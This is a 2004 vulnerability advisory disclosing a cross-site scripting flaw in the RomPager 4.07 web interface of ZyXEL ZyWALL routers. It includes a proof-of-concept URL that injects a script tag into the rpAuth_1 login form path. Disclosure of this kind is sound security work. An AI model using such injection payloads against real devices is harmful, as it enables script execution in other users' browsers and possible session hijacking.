####################################################################### Device: ZyXEL10 OF ZyWALL Series Router Software: RomPager/4.07 UPnP/1.0 Vendor: http://www.zyxel.com Versions: 4.07 Platforms: Windows Bug: Cross Site Scripting Vulnerabillity Risk: Low Exploitation: Remote with browser Date: 6 Jan 2004 Author: Rafel Ivgi, The-Insider e-mail: the_insider@mail.com web: http://theinsider.deep-ice.com ####################################################################### 1) Introduction 2) Bug 3) The Code ####################################################################### =============== 1) Introduction =============== ZyXEL10 is a high quality VPN router. the ZyWALL 10 offers a powerful firewall capability, including Stateful Packet Inspection and Anti Denial of Service (D.o.S). Device Details: http://www.zyxel.com/product/model.php?indexcate=1022044503&indexFlagvalue=1 021873683 ####################################################################### ====== 2) Bug ====== The Vulnerabillity is Cross Site Scripting type. If an attacker will request the followingurl from the server http://<host>/Forms/rpAuth_1?ZyXEL%20ZyWALL%20Series<script>alert('XSS')</sc ript> XSS appears and the server allows an attacker to inject & execute scripts. ####################################################################### =========== 3) The Code =========== http://<host>/Forms/rpAuth_1?ZyXEL%20ZyWALL%20Series<script>alert('XSS')</sc ript> ####################################################################### --- Rafel Ivgi, The-Insider http://theinsider.deep-ice.com "Things that are unlikeable, are NOT impossible."
